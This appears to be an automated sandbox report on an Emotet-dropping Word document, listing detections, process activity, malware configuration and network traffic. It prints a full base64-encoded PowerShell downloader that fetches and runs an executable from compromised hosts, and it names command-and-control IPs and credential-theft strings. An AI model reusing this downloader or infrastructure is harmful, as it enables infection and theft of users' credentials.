Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111 (renamed file extension from 9111 to doc)
Analysis ID:255713
MD5:84b4a3bdfd680dc3fde940f31a74dc97
SHA1:e0ca5c78044b5feee5e67dc4e74a7420d5705f05
SHA256:501948f523c9bce4662fe102da5d632e953fccc2f521565eabc8f424297a4f1f

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6740 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6888 cmdline: powersheLL -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUwBYAEwAVQBQAGcAdwBpACAAPQAgACcANQA0ADUAJwA7ACQAVwBBAFEATABOAG8AdwBoAD0AJwBPAEgASQBFAFoAeQBoAHUAJwA7ACQAUQBMAFMASgBLAGkAcQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAFgATABVAFAAZwB3AGkAKwAnAC4AZQB4AGUAJwA7ACQARwBXAFoAWgBCAGoAagBqAD0AJwBDAEEATABRAEIAcwB1AG0AJwA7ACQAUgBOAFoATABNAHAAZQB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBCAEMATABpAEUATgBUADsAJABGAEwAWQBDAE4AaQBwAGUAPQAnAGgAdAB0AHAAOgAvAC8AagBrAG4AYwByAGUAdwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAEsAaABTAE8AMQA2AFoAQQBBAGYALwAqAGgAdAB0AHAAOgAvAC8AagBtAGwAYQBuAGQAcwBjAGEAcABpAG4AZwBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwBjAG8AbgB0AGUAbgB0AC8AZgBoAEcAQQBmAEsAcwAvACoAaAB0AHQAcAA6AC8ALwBqAGkAbQBsAG8AdwByAHkALgBjAG8AbQAvAGQAbABxAEMAVABjADAAMQBwAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABlAHMAbABpAGUAbQBvAG4AdABlAG4AZQBnAHIAbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQAxAGgASABxAEQARQA2AC8AKgBoAHQAdABwADoALwAvAGoAbwBoAG4AawBlAGEAbgBlAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAHIAMAAwAHQALwB2AEEAVwBFAGwAUgBtAC8AJwAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAEcAVwBWAFMAbABkAHUAPQAnAFkATQBHAFIAUABmAGIAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBXAFAAQQBJAGoAbwBtACAAaQBuACAAJABGAEwAWQBDAE4AaQBwAGUAKQB7AHQAcgB5AHsAJABSAE4AWgBMAE0AcABlAHoALgAiAEQAbwBXAGAATgBMAG8AQQBgAEQARgBpAEwARQAiACgAJABKAFcAUABBAEkAagBvAG0ALAAgACQAUQBMAFMASgBLAGkAcQBhACkAOwAkAEMAWABaAEcAQwBkAGEAdAA9ACcAVgBYAEYAUQBKAG4AcABxACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBMAFMASgBLAGkAcQBhACkALgAiAGwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADIAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAEEAdABlACIAKAAkAFEATABTAEoASwBpAHEAYQApADsAJABLAEUATgBXAEgAcwBsAHcAPQAnAEwATABGAE8AVQBiAHMAcAAnADsAYgByAGUAYQBrADsAJABLAEUAUwBWAFkAZQBoAHgAPQAnAEkARABUAEIAWQBzAHcAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAEIAUgBOAFIAZwBzAGgAPQAnAFAASQBMAE8AUgB4AGYAZwAnAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 545.exe (PID: 5592 cmdline: C:\Users\user\545.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
    • utildll.exe (PID: 5512 cmdline: C:\Windows\SysWOW64\winipcfile\utildll.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildll.exe (PID: 4528 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' 'C:\Users\user\AppData\Local\Temp\4836.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildll.exe (PID: 6092 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildll.exe (PID: 6112 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\516F.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • utildlloe.exe (PID: 6896 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildlloe.exe' 'C:\Users\user\AppData\Local\Temp\4836.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 4656 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6372 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6428 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6488 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6500 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.639509.qla+rpjA.20200802002217.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xfc9:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfc9:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfc9:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.639509.qla+rpjA.20200802002217.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.521515078.00000000032B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            00000006.00000002.280422240.0000000002310000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 20 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              7.2.utildll.exe.32b0000.4.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.utildll.exe.32b0000.4.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  7.2.utildll.exe.3cd0000.8.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    7.2.utildll.exe.3b20000.7.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      19.2.utildll.exe.400000.0.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
                      • 0x131b0:$a1: logins.json
                      • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
                      • 0x13934:$s4: \mozsqlite3.dll
                      • 0x121a4:$s5: SMTP Password
                      Click to see the 18 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Process CreationShow sources
                      Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', CommandLine: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\winipcfile\utildll.exe, NewProcessName: C:\Windows\SysWOW64\winipcfile\utildll.exe, OriginalFileName: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentCommandLine: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentImage: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentProcessId: 5512, ProcessCommandLine: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', ProcessId: 6092

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results
                      Source: C:\Users\user\545.exeCode function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,6_2_00444717
                      Source: C:\Users\user\545.exeCode function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,6_2_004390BA
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeCode function: 7_2_00444717 lstrlenA,FindFirstFileA,FindClose,7_2_00444717
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeCode function: 7_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,7_2_004390BA
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeCode function: 18_2_0040A1A7 FindFirstFileW,FindNextFileW,18_2_0040A1A7
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeCode function: 18_1_0040A1A7 FindFirstFileW,FindNextFileW,18_1_0040A1A7
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                      Source: C:\Windows\SysWOW64\winipcfile\utildll.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                      Source: winword.exeMemory has grown: Private usage: 0MB later: 65MB
                      Source: global trafficDNS query: name: jkncrew.com
                      Source: global trafficTCP traffic: 192.168.2.3:49740 -> 185.94.252.13:443
                      Source: global trafficTCP traffic: 192.168.2.3:49723 -> 50.31.160.189:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 50.31.160.189:80 -> 192.168.2.3:49723
                      Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49740 -> 185.94.252.13:443
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1Host: jkncrew.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1Host: jmlandscapingservice.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/ HTTP/1.1Referer: http://185.94.252.13/JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/Content-Type: multipart/form-data; boundary=---------------------------303308476707525User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /uPWiBqbjc/bfNLb/n3e4xA4IL2qE8YZeH/AYUkbtjPwa3iFoOYi8/6jL14rWQuU/AL8Dgb/ HTTP/1.1Referer: http://185.94.252.13/uPWiBqbjc/bfNLb/n3e4xA4IL2qE8YZeH/AYUkbtjPwa3iFoOYi8/6jL14rWQuU/AL8Dgb/Content-Type: multipart/form-data; boundary=---------------------------802471010945937User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /PMx1be2sKY7dhiY1/dC97ETJ0RahEi6A8/NPnXAB/LY6ug5VG46Uk8OoBQa/luBTtDDM/ HTTP/1.1Referer: http://185.94.252.13/PMx1be2sKY7dhiY1/dC97ETJ0RahEi6A8/NPnXAB/LY6ug5VG46Uk8OoBQa/luBTtDDM/Content-Type: multipart/form-data; boundary=---------------------------727120016898053User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /4KiHd4GoeAQXach/KjEdPGt0vC/kIHvyhe2pRtlKS0s/RjHIcnY2eCuZJVkp5Q/HJxB0xobwYH37hSEIip/0aZH6cqpcvQi2/ HTTP/1.1Referer: http://185.94.252.13/4KiHd4GoeAQXach/KjEdPGt0vC/kIHvyhe2pRtlKS0s/RjHIcnY2eCuZJVkp5Q/HJxB0xobwYH37hSEIip/0aZH6cqpcvQi2/Content-Type: multipart/form-data; boundary=---------------------------177700964308477User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /ybxxSm0NduJr/21PWG/5BiKx/AWjhrrKjVVl5ac9/pcFlZM25RbM5MdjKnZ/ HTTP/1.1Referer: http://185.94.252.13/ybxxSm0NduJr/21PWG/5BiKx/AWjhrrKjVVl5ac9/pcFlZM25RbM5MdjKnZ/Content-Type: multipart/form-data; boundary=---------------------------826509774945116User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /6v6iac1tzc9jjbHG2/l1yGs2CoJVDYVFD0/ HTTP/1.1Referer: http://185.94.252.13/6v6iac1tzc9jjbHG2/l1yGs2CoJVDYVFD0/Content-Type: multipart/form-data; boundary=---------------------------403684127386855User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /Mf04o60zoJs/cAkWwU/0UIp9fAdSvEBJ/g9TH9Tt/F5Z0WoD/wjQA/ HTTP/1.1Referer: http://88.217.172.65/Mf04o60zoJs/cAkWwU/0UIp9fAdSvEBJ/g9TH9Tt/F5Z0WoD/wjQA/Content-Type: multipart/form-data; boundary=---------------------------147600063783432User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                      Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                      Source: unknownTCP traffic detected without corresponding DNS query: 73.116.193.136
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1Host: jkncrew.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1Host: jmlandscapingservice.comConnection: Keep-Alive
                      Source: utildll.exe, 00000012.00000002.377512445.0000000000B29000.00000004.00000040.sdmpString found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.12917.8592.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: utildll.exe, 00000012.00000002.377512445.0000000000B29000.00000004.00000040.sdmpString found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.12917.8592.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: utildll.exe, 00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp, utildll.exe, 00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: utildll.exe, 00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp, utildll.exe, 00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: utildll.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: unknownDNS traffic detected: queries for: jkncrew.com
                      Source: unknownHTTP traffic detected: POST /JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/ HTTP/1.1Referer: http://185.94.252.13/JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/Content-Type: multipart/form-data; boundary=---------------------------303308476707525User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
